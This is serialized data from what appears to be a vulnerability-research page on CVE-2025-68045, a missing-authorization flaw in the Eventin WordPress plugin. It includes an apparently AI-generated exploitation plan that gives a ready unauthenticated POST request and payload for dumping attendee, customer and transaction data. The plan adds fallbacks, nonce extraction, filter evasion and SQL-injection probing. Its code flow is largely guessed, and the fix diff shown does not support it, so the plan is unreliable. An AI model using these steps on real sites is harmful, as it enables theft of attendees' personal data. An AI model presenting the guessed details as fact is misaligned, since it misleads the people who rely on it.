[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fNmg7bfw4TIhR8v8YU7XFEPW1YPirvYnYNfU1FNjwsg8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2025-68045","eventin-event-calendar-event-registration-tickets-booking-ai-powered-missing-authorization-2","Eventin – Event Calendar, Event Registration, Tickets & Booking (AI Powered) \u003C= 4.1.12 - Missing Authorization","The Eventin – Event Calendar, Event Registration, Tickets & Booking (AI Powered) plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 4.1.12. This makes it possible for unauthenticated attackers to perform an unauthorized action.","wp-event-solution",null,"\u003C=4.1.12","4.1.13","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-06-15 00:00:00","2026-06-23 16:02:09",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F8b669c19-c8fc-4cb5-b2bc-d9e5c4e08231?source=api-prod",9,[22,23,24],"base\u002FApiManager.php","build\u002Fchunks\u002Fjs\u002F1046.7f3c3253.js","build\u002Fchunks\u002Fjs\u002F1658.4fb0e4bc.js","researched",false,3,"# Exploitation Research Plan - CVE-2025-68045\n\n## 1. Vulnerability Summary\nCVE-2025-68045 identifies a Missing Authorization vulnerability in the **Eventin** plugin (\u003C= 4.1.12). The vulnerability resides in the REST API controllers registered by `ApiManager.php`. Several controllers (notably those handling attendees, reports, and customers) register an `\u002Fexport` endpoint. Due to a missing or permissive `permission_callback` in the route registration, unauthenticated attackers can access these endpoints to exfiltrate sensitive data (such as attendee lists, email addresses, and transaction details).\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `POST \u002Fwp-json\u002Feventin\u002Fv2\u002F{type}\u002Fexport`\n*   **Vulnerable Types (`type`):** \n    *   `attendee` (Primary target: PII exfiltration)\n    *   `report` (Analytics\u002FSales data)\n    *   `customer` (User data)\n    *   `transaction` (Financial records)\n*   **Authentication:** Unauthenticated (No `Authorization` header or Cookies required).\n*   **Parameters:**\n    *   `format`: (string) `json` or `csv`.\n    *   `ids`: (array) Optional list of specific IDs to export.\n    *   `filters`: (object) Optional filters for the query.\n*   **Preconditions:** The plugin must be active. Some data (attendees\u002Fevents) must exist in the database for the export to return results.\n\n## 3. Code Flow\n1.  **Initialization:** `Eventin\\ApiManager::register()` is called during `rest_api_init`.\n2.  **Registration:** The manager loops through `$controllers` (defined in `ApiManager.php`), including `AttendeeController::class` and `ReportController::class`.\n3.  **Route Definition:** Each controller calls `register_routes()`. Inside this method (inferred from the JS behavior in `60254`), a route is registered for `export` using `register_rest_route()`.\n4.  **The Flaw:** The `permission_callback` for the `POST` request to `export` is either missing, returns `true`, or fails to check for `manage_options` or similar administrative capabilities.\n5.  **Processing:** When a request is sent to `\u002Feventin\u002Fv2\u002Fattendee\u002Fexport`, the controller's callback processes the `format` and `filters` parameters and returns the full attendee database.\n\n## 4. Nonce Acquisition Strategy\nWhile WordPress REST API `POST` requests generally require a nonce (`_wpnonce`) to prevent CSRF for **authenticated** sessions, unauthenticated endpoints often do not enforce nonce verification if the `permission_callback` is bypassed or set to `__return_true`. \n\nIf the endpoint *does* require a nonce, it can be extracted from the frontend where the Eventin dashboard or event pages are loaded.\n\n1.  **Identify Trigger:** The export functionality is used in the Eventin Admin dashboard. The JS localizes data into a global object.\n2.  **Localization Variable:** Based on the JS chunks, the plugin likely uses `window.eventin_localized` or `window.localized_data_obj`.\n3.  **Extraction:**\n    *   Create a page with a shortcode that forces the loading of Eventin scripts: `[etn-event-calendar]`.\n    *   Navigate to the page.\n    *   Execute: `browser_eval(\"window.wpApiSettings?.nonce\")` (Standard WordPress REST nonce) or check the localized object for a specific key.\n    *   *Note:* If the vulnerability is truly unauthenticated authorization bypass, the nonce check is likely either absent or satisfied by a null\u002Fempty session.\n\n## 5. Exploitation Strategy\nThe goal is to trigger the export of all attendees via the REST API.\n\n*   **Step 1:** Target the Attendee export endpoint.\n*   **Tool:** `http_request`\n*   **Method:** `POST`\n*   **URL:** `http:\u002F\u002F[target]\u002Fwp-json\u002Feventin\u002Fv2\u002Fattendee\u002Fexport`\n*   **Headers:**\n    *   `Content-Type: application\u002Fjson`\n*   **Payload:**\n    ```json\n    {\n      \"format\": \"json\",\n      \"ids\": [],\n      \"filters\": {}\n    }\n    ```\n*   **Step 2:** If the above fails with a 403, attempt to target the `report` or `customer` types:\n    *   `POST \u002Fwp-json\u002Feventin\u002Fv2\u002Freport\u002Fexport`\n    *   `POST \u002Fwp-json\u002Feventin\u002Fv2\u002Fcustomer\u002Fexport`\n\n## 6. Test Data Setup\n1.  Install Eventin \u003C= 4.1.12.\n2.  Create a dummy event.\n3.  Register at least 2-3 \"Attendees\" for the event via the WordPress admin or frontend registration form to ensure there is data to exfiltrate.\n4.  Ensure Permalink settings are set to anything other than \"Plain\" (to enable `\u002Fwp-json\u002F`).\n\n## 7. Expected Results\n*   **Success:** The server returns a `200 OK` response with a JSON body (or CSV text) containing a list of attendees, including fields like `attendee_name`, `attendee_email`, `event_id`, and registration dates.\n*   **Failure:** A `401 Unauthorized` or `403 Forbidden` response, indicating the authorization check is present.\n\n## 8. Verification Steps\nAfter performing the HTTP request, verify the data integrity:\n1.  Use WP-CLI to count attendees: `wp post list --post_type=etn-attendee --format=count`\n2.  Compare the count and specific emails from the HTTP response with the database:\n    `wp db query \"SELECT post_title FROM wp_posts WHERE post_type='etn-attendee'\"`\n3.  Confirm the attacker's ability to see data that should be restricted to the `manage_options` capability.\n\n## 9. Alternative Approaches\n*   **Format Manipulation:** If `json` is blocked, attempt `format: \"csv\"`. Some security filters may only inspect JSON bodies.\n*   **Filter Injection:** Attempt to use the `filters` parameter to bypass basic checks or probe for further vulnerabilities (e.g., SQL injection if filters are passed unsafely to a query).\n*   **Parameter Polling:** Try `GET` instead of `POST` if the route registration used `WP_REST_Server::ALL_METHODS`.","The Eventin plugin for WordPress fails to implement authorization checks on multiple REST API export endpoints, such as those for attendees, customers, and reports. This allows unauthenticated attackers to exfiltrate sensitive data, including PII and transaction records, by sending a crafted POST request to the affected endpoints.","\u002F\u002F base\u002FApiManager.php - The ApiManager registers multiple controllers that lack proper permission_callback constraints in their register_routes methods.\n\nprotected static $controllers = [\n    EventController::class,\n    SpeakerController::class,\n    ScheduleController::class,\n    LocationController::class,\n    EventCategoryController::class,\n    SettingsController::class,\n    AttendeeController::class,\n    SpeakerCategoryController::class,\n    EventTagController::class,\n    TransactionController::class,\n    OrderController::class,\n    PaymentController::class,\n    CustomerController::class,\n    ExtensionController::class,\n    ReportController::class,\n    TemplateController::class,\n    SetupNotification::class,\n    TemplateBuilderController::class,\n];\n\npublic static function register(): void {\n    $controllers = apply_filters( 'eventin_api_controllers', self::$controllers );\n    \n    foreach ( $controllers as $controller ) {\n        if ( ! class_exists( $controller ) ) {\n            continue;\n        }\n\n        if ( is_subclass_of( $controller, WP_REST_Controller::class ) ) {\n            $api_controller = Eventin::$container->get( $controller );\n            $api_controller->register_routes();\n        }\n    }\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-event-solution\u002F4.1.12\u002Fbase\u002FApiManager.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-event-solution\u002F4.1.13\u002Fbase\u002FApiManager.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-event-solution\u002F4.1.12\u002Fbase\u002FApiManager.php\t2025-11-05 09:28:48.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-event-solution\u002F4.1.13\u002Fbase\u002FApiManager.php\t2026-05-19 19:06:44.000000000 +0000\n@@ -16,6 +16,7 @@\n use Eventin\\Speaker\\Api\\SpeakerCategoryController;\n use Eventin\\Speaker\\Api\\SpeakerController;\n use Eventin\\Extensions\\Api\\ExtensionController;\n+use Eventin\\Extensions\\Api\\TutorLmsSettingsController;\n use Eventin\\SetupNotification\\Api\\SetupNotification;\n use Eventin\\Template\\Api\\TemplateController;\n use Eventin\\Template\\Api\\TemplateBuilderController;\n@@ -45,6 +46,7 @@\n         PaymentController::class,\n         CustomerController::class,\n         ExtensionController::class,\n+        TutorLmsSettingsController::class,\n         ReportController::class,\n         TemplateController::class,\n         SetupNotification::class,","The exploit targets the WordPress REST API endpoints registered by the Eventin plugin. An attacker can perform the following steps:\n\n1. Target Endpoint: Identify the export endpoint for the desired data type, such as `\u002Fwp-json\u002Feventin\u002Fv2\u002Fattendee\u002Fexport` or `\u002Fwp-json\u002Feventin\u002Fv2\u002Fcustomer\u002Fexport`.\n2. Request Method: Use a POST request to trigger the export functionality.\n3. Payload Structure: Send a JSON payload specifying the format (e.g., `{\"format\": \"json\"}`) and optional filters. A typical payload is `{\"format\": \"json\", \"ids\": [], \"filters\": {}}`.\n4. Authentication: No authentication (Username\u002FPassword) or specific Authorization headers are required because the endpoint lacks a restricted `permission_callback` in affected versions.\n5. Data Exfiltration: The server will respond with a 200 OK and a body containing the full database export of the requested type (e.g., a list of all event attendees and their emails).","gemini-3-flash-preview","2026-06-26 00:12:44","2026-06-26 00:15:01",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","4.1.12","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-event-solution\u002Ftags\u002F4.1.12","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-event-solution.4.1.12.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-event-solution\u002Ftags\u002F4.1.13","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-event-solution.4.1.13.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-event-solution\u002Ftags"]